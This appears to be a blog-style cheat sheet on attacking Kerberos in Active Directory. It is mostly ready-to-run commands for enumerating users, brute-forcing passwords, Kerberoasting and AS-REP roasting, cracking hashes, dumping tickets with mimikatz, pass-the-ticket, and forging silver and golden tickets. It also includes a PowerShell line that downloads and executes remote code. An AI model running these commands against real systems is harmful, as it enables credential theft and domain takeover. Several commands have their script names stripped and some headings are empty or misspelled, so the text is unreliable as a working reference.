Today I will write about Kerberos Penetration Testing, which Active Directory uses to manage authentication inside the corporate environments.

First a brief explanation about how Kerberos works and what we should know before trying to hack Kerberos.

Kerberos Introduction

Kerberos flows

Kerberos Components

  • KDC – Kerberos Distribution Center
  • Client – The client is requesting access to a service
  • Service – service to allow when a ticket is requested

TGT – Ticket Granting Ticket

SPN – Service Principals’ Names are associated with service accounts and they can be used to request Kerberos service tickets (TGS).

In Kerberos, if the RC4_HMAC_MD5 encryption is in use, we have an NTLM hash.

Kerberos Authentication


Kerberos Penetration Testing


nmap --script krb5-enum-users --script-args krb5-enum-users.realm='rfs.local'-p 88 <target-ip>
kerbrute userenum --dc -d example.domain usernames.txt
kerbture bruteuser --dc -d example.domain passwords.txt username

Kerberos Vulnerability Analysis

Kerberos Attacks

Brute Force Kerberos

kerbrute bruteforce --dc -d example.domain combos.txt


python <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>
.\Rubeus.exe kerberoast /outfile:<output_TGSs_file>
iex (new-object Net.WebClient).DownloadString("")
Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>
Crack the Hashes
hashcat -m 13100 --force <TGSs_file> <passwords_file>
john --format=krb5tgs --wordlist=<passwords_file> <AS_REP_responses_file>


Check ASREPRoast for all domain users (credentials required).

python <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

Check ASREPRoast for a list of users (no credentials required)

python <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

Pass The Ticket (PTT)

Harvest Tickets in Linux
grep default_ccache_name /etc/krb5.conf
cp tickey /tmp/tickey
/tmp/tickey -i

Harvest Tickets in Windows

mimikatz # sekurlsa::tickets /export
.\Rubeus dump
Convert Tickets
python ticket.kirbi ticket.ccache
python ticket.ccache ticket.kirbi

Overpass The Hash/Pass The Key (PTK)

python <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
python <domain_name>/<user_name> -aesKey <aes_key>
python <domain_name>/<user_name>:[password]
export KRB5CCNAME=<TGT_ccache_file>
python <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Silver Tickets

python -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>
python -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>
export KRB5CCNAME=<TGS_ccache_file>
Execute remote command to use the TGT.
python <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Golder Tickets

python -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name>  <user_name>
python -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name>  <user_name>
export KRB5CCNAME=<TGS_ccache_file>
python <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Kerberos Post-Exploitation

F.A.Q Pentesting Kerberos

NetBios Penetration Testing

SNMP Penetration Testing

SMTP Penetration Testing

SSH Penetration Testing

FTP penetration testing